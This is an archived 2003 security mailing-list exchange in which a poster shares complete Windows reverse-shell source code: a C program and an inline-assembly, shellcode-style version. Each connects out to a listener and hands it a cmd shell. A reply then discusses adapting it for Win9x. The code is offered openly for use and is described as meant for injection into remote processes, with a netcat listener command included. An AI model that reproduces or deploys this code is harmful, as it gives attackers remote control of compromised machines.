Re[2]: Windows reverse Shell #2
From: NetNinja (netninja@hotmail.kg)
Date: 02/08/03
Date: Sat, 8 Feb 2003 13:11:26 +0600 From: NetNinja <netninja@hotmail.kg> To: "s7726" <s7726@yahoo.com>
Hello s7726,
Saturday, February 8, 2003, 12:09:45 AM, you wrote:
s> Could this work on a win9x machine? with some mods of course. namely command
s> rather than cmd, or is this strictly an NT/2k thing?
s> Thanx,
s> Gavin S.
s> -----Original Message-----
s> From: NetNinja [mailto:netninja@hotmail.kg]
s> Sent: Friday, February 07, 2003 4:45 AM
s> To: vuln-dev@securityfocus.com
s> Subject: Windows reverse Shell #2
s> Hello folks,
s> Thnx everyone for ur replies.
s> Today i found time to have a careful look at my reverse shell C source
s> code. The problem that i had was very simple. In my C source i forgot to
s> initialize the STARTUPINFO struct to zero. That was the problem. 3APA3A's
s> code did initialize that struct, so big thnx to him. Another thing
s> u have to do is to cast socket handle returned from WSASocket call to
s> ptr type and pass it on to stdInput,stdOutput and stdErr of
s> STARTUPINFO struct.
s> That's it!
s> If anyone is interested in reverse cmd shell for windows i have
s> included both C and inline asm version. so have a look at them.
s> ---- C ---------------
s> /*
s> reverse cmd shell
s> Will spit back command shell on ur listening netcat
s> on ur localhost (127.0.0.2) port 55
s> set up ur netcat eg. nc -l -p 55 -vv
s> A*** (netninja@hotmail.kg)
s> http://netninja.to.kg
s> */
s> #include <winsock2.h>
s> #include <stdio.h>
s> #pragma comment(lib,"ws2_32")
s> void main(int argc, char *argv[])
s> {
s> WSADATA wsaData;
s> SOCKET hSocket;
s> STARTUPINFO si;
s> PROCESS_INFORMATION pi;
s> struct sockaddr_in adik_sin;
s> memset(&adik_sin,0,sizeof(adik_sin));
s> memset(&si,0,sizeof(si));
s> WSAStartup(MAKEWORD(2,0),&wsaData);
s> hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
s> adik_sin.sin_family = AF_INET;
s> adik_sin.sin_port = htons(55);
s> adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
s> connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
s> si.cb = sizeof(si);
s> si.dwFlags = STARTF_USESTDHANDLES;
s> si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
s> CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
s> ExitProcess(0);
s> }
s> ------[ end C ]--------------
s> ----[ inline ASM ]------
s> /*
s> reverse cmd shell
s> inline asm version
s> reverse cmd shell on address 127.0.0.1 port 55
s> A*** (netninja@hotmail.kg)
s> http://netninja.to.kg
s> */
s> #include <winsock2.h>
s> #include <stdio.h>
s> #pragma comment(lib,"ws2_32")
s> #define GP 0x77E7B332
s> #define LL 0x77E7D961
s> #define CreateProcessA [ebp-8]
s> #define ExitProcess [ebp-0ch]
s> #define WSASocketA [ebp-10h]
s> #define connect [ebp-14h]
s> #define CMD_STR [ebp-18h]
s> #define PORT 0x3700 //(htons(55)) here u gotta
s> reverse byte order 0x0037=3700
s> #define IPADDR 0x0100007F //
s> 7F000001//(inet_addr("127.0.0.1"))
s> void main(int argc, char *argv[])
s> {
s> char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0"
s> "ws2_32\0WSASocketA\0connect\0\0\0cmd\0\0\0";
s> char *i=ptr;
s> WSADATA wsaData;
s> WSAStartup(MAKEWORD(2,0),&wsaData); //initialize
s> winsock, this is not done below
s> // usually when u inject ur shellcode into remote process
s> // socket is already initialized
s> __asm
s> {
s> mov edi, i
s> dec edi
s> push ebp
s> mov ebp,esp
s> sub esp,0x20
s> mov ecx,ebp
s> sub ecx,4h
s> push ecx
s> load_lib:
s> inc edi
s> cmp byte ptr[edi],0
s> je done_loadin
s> push edi
s> mov eax, LL
s> call eax //LoadLibrary("Lib")
s> mov [ebp-4],eax //places lib handle into ebp-4
s> xor eax,eax
s> repne scasb
s> load_func:
s> cmp byte ptr[edi],0
s> je load_lib
s> push edi
s> mov ebx, dword ptr[ebp-4] //lib handle
s> push ebx
s> mov eax, GP
s> call eax
s> //GetProcAddress("Function")
s> pop ecx
s> sub ecx,4
s> mov dword ptr[ecx], eax
s> push ecx
s> xor eax,eax
s> repne scasb
s> jmp load_func
s> done_loadin:
s> xor eax,eax
s> inc edi
s> mov dword ptr[ebp-18h],edi
s> mov ecx,50 //make some
s> space for structs
s> push_em:
s> push eax
s> loop push_em
s> push 0x1
s> push 0x2
s> call WSASocketA
s> mov ebx, eax //copies sockethandle returned into
s> ebx
s> //ebp-20h
s> mov dword ptr[ebp-40h],0x2
s> //sockaddr_in
s> mov word ptr[ebp-3Eh],PORT
s> mov dword ptr[ebp-3Ch],IPADDR
s> //mov dword ptr[ebp-40h],process_information
s> mov dword ptr[ebp-94h],0x44 //sizeof startupinfo
s> mov dword ptr[ebp-68h],0x100 //dwFlags
s> mov dword ptr[ebp-5Ch],ebx //stdio
s> mov dword ptr[ebp-58h],ebx //stdout
s> mov dword ptr[ebp-54h],ebx //stderr
s> push 0x10
s> //sizeof sockaddr_in
s> lea edx, dword ptr[ebp-40h]
s> push edx
s> //ptr to sockaddr_in
s> push ebx
s> //socket handle
s> call connect
s> lea edx,dword ptr[ebp-50h]
s> push edx //push
s> proc_info
s> lea edx,dword ptr[ebp-94h]
s> push edx //push ptr
s> to startupinfo
s> xor edx,edx
s> push edx
s> push edx
s> push edx
s> inc edx
s> //inheritHandles = true
s> push edx
s> dec edx
s> push edx
s> push edx
s> mov eax,CMD_STR //ptr to "cmd" str
s> push eax
s> push edx
s> call CreateProcessA
s> push edx
s> call ExitProcess
s> }
s> }
s> ----[ end ]------
s> --
s> Best regards,
s> A*** (NetNinja) mailto:netninja@hotmail.kg
When i put command.com instead of cmd.exe as a parameter to
CreateProcess, the reverse command shell appeared on my
nc, however i failed to execute any command and see the results. In addition
to that my nc stopped responding and CPU usage jumped to 100%, so i had to shut it down.
But u can try playing and poking around with it; perhaps u will see different results.
-- Best regards, NetNinja mailto:netninja@hotmail.kg